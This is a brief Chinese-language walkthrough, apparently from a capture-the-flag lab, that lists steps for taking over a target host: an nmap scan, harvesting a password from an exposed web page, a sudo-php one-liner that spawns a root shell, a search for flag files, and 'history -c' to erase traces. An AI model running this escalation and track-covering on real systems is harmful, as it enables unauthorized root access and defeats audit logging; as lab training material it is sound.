nmap 扫描端口:获取目标主机ip即端口等信息
nmap ip
登陆暴露出的 web,观察获取目标用户密码
登陆主机
查看用户权限
sudo -l
利用php漏洞提权root
sudo php -r 'system("/bin/bash");'
获取相关数据
find / -name 'flag*.txt'
删除历史记录
history -c